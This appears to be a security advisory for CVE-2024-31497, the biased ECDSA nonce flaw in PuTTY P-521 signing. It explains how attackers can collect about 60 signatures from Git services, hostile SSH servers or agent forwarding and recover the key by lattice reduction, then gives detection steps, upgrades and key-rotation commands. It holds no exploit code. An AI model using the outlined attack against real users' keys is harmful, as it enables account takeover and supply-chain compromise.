CVE-2024-31497 Overview
CVE-2024-31497 is a cryptographic vulnerability affecting PuTTY versions 0.68 through 0.80 that allows an attacker to recover a user's NIST P-521 secret key through biased ECDSA nonce generation. The vulnerability enables key recovery with approximately 60 signatures, making it particularly dangerous in scenarios where signed messages are publicly accessible, such as Git commit signatures stored in public repositories.
This vulnerability poses significant risks in two primary attack scenarios. First, adversaries may already possess sufficient signature information from public Git services that support SSH commit signing, especially when signatures were made through Pageant's agent-forwarding mechanism. Second, a malicious SSH server operator could derive a victim's private key during authentication, then use it for unauthorized access to other services where the same key is used.
Critical Impact
Private key compromise enables supply-chain attacks on software maintained in Git repositories and unauthorized access to SSH-authenticated services.
Affected Products
- PuTTY versions 0.68 through 0.80
- FileZilla Client before version 3.67.0
- WinSCP before version 6.3.3
- TortoiseGit before version 2.15.0.1
- TortoiseSVN through version 1.14.6
- Fedora 38, 39, and 40
Discovery Timeline
- April 15, 2024 - CVE-2024-31497 published to NVD
- November 4, 2025 - Last updated in NVD database
Technical Details for CVE-2024-31497
Vulnerability Analysis
The vulnerability stems from a fundamental flaw in how PuTTY generates ECDSA nonces when signing with NIST P-521 keys. ECDSA signatures require a cryptographically secure random nonce for each signature operation. When the nonce generation exhibits statistical bias, as is the case with CVE-2024-31497, attackers can apply lattice-based cryptographic attacks to recover the private key.
The biased nonce generation in PuTTY's implementation allows an attacker who can observe approximately 60 ECDSA signatures to mathematically derive the private key. This is particularly concerning because the signatures themselves are not secret—they are transmitted as part of normal SSH authentication and Git commit signing operations.
The attack is feasible even for past signatures. If a user has been using vulnerable PuTTY versions with NIST P-521 keys for SSH authentication to public Git services or any server where signatures were captured, those historical signatures may be sufficient for key recovery without any further interaction with the victim.
Root Cause
The root cause of CVE-2024-31497 is classified as CWE-338 (Use of Cryptographically Weak Pseudo-Random Number Generator). PuTTY's ECDSA nonce generation for P-521 curves introduced a statistical bias that reduces the effective entropy of the nonces. When nonces are not uniformly distributed across the expected range, each signature leaks partial information about the private key.
The cryptographic principle being violated is that ECDSA security relies on nonces being indistinguishable from random values across the full range. The bias in PuTTY's implementation creates a mathematical relationship between multiple signatures that can be exploited using Lenstra–Lenstra–Lovász (LLL) lattice reduction algorithms.
Attack Vector
The attack can be executed remotely by any adversary who can collect sufficient ECDSA signatures made with the victim's NIST P-521 key. There are multiple collection vectors:
Public Git Services: Signatures for Git commits are publicly visible on platforms like GitHub when SSH signing is used. An attacker can passively collect these signatures from any public repository where the victim has committed code.
Malicious SSH Server: An attacker operating an SSH server (even one the victim intentionally connects to) can collect authentication signatures. This is particularly dangerous when users employ the same key across multiple services.
Agent Forwarding Interception: When Pageant's agent-forwarding mechanism is used, intermediate servers can observe signatures, creating additional exposure points.
Once approximately 60 signatures are collected, the attacker applies lattice reduction techniques to solve for the private key. A proof-of-concept exploit is available at the CVE-2024-31497 PoC Repository, and additional technical analysis of ECDSA lattice attacks can be found at the ECDSA Break Analysis Repository.
Detection Methods for CVE-2024-31497
Indicators of Compromise
- NIST P-521 SSH keys used with PuTTY versions 0.68-0.80, FileZilla before 3.67.0, WinSCP before 6.3.3, TortoiseGit before 2.15.0.1, or TortoiseSVN through 1.14.6
- Unauthorized access to systems using SSH authentication where the victim's P-521 key was previously used
- Unexpected Git commits signed with the victim's key appearing in repositories
- Authentication logs showing access from unfamiliar IP addresses using legitimate P-521 keys
Detection Strategies
- Audit SSH key inventory to identify any NIST P-521 keys that may have been used with vulnerable software versions
- Review Git commit histories on public repositories for signatures made with potentially compromised keys
- Monitor authentication logs for SSH connections using P-521 keys from unexpected sources or geolocations
- Implement alerting for any new SSH key usage patterns that deviate from established baselines
Monitoring Recommendations
- Enable verbose SSH logging on critical servers to capture key fingerprints and signature details for forensic analysis
- Deploy endpoint detection solutions to identify vulnerable PuTTY, FileZilla, WinSCP, TortoiseGit, and TortoiseSVN versions across the enterprise
- Monitor Git platforms for commit signing activity and correlate with known vulnerable client usage
- Implement network monitoring to detect SSH connections to unusual destinations that could indicate key compromise testing
How to Mitigate CVE-2024-31497
Immediate Actions Required
- Immediately upgrade PuTTY to version 0.81 or later, which contains the fix for the biased nonce generation
- Update all affected software: FileZilla to 3.67.0+, WinSCP to 6.3.3+, TortoiseGit to 2.15.0.1+
- Assume any NIST P-521 keys used with vulnerable versions are compromised and should be rotated
- Revoke and regenerate affected SSH keys, then update authorized_keys files on all servers
- Consider switching to Ed25519 keys, which are not affected by this vulnerability
Patch Information
PuTTY version 0.81 addresses this vulnerability by correcting the ECDSA nonce generation for P-521 curves. The patch details are available in the PuTTY source repository and the PuTTY changelog. The official vulnerability advisory is documented in the PuTTY wishlist.
For Fedora users, updated packages are available through the standard package management system. Debian users should refer to the Debian LTS Announcement for patch availability.
Workarounds
- If immediate patching is not possible, discontinue use of NIST P-521 keys and switch to Ed25519 or RSA keys
- Avoid using Pageant agent forwarding until the software is updated
- Restrict SSH authentication to trusted servers only and avoid connecting to untrusted SSH endpoints
- Remove any P-521 public keys from authorized_keys files on critical systems until key rotation is complete
# Identify and rotate P-521 keys
# List all SSH keys to identify P-521 keys that need rotation
ssh-keygen -l -f ~/.ssh/id_ecdsa
# Generate a new Ed25519 key as a replacement (recommended)
ssh-keygen -t ed25519 -C "replacement-key@example.com"
# Update authorized_keys on remote servers
ssh-copy-id -i ~/.ssh/id_ed25519.pub user@remote-server
# Remove old P-521 key from remote servers
ssh user@remote-server "sed -i '/ecdsa-sha2-nistp521.*compromised-key/d' ~/.ssh/authorized_keys"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
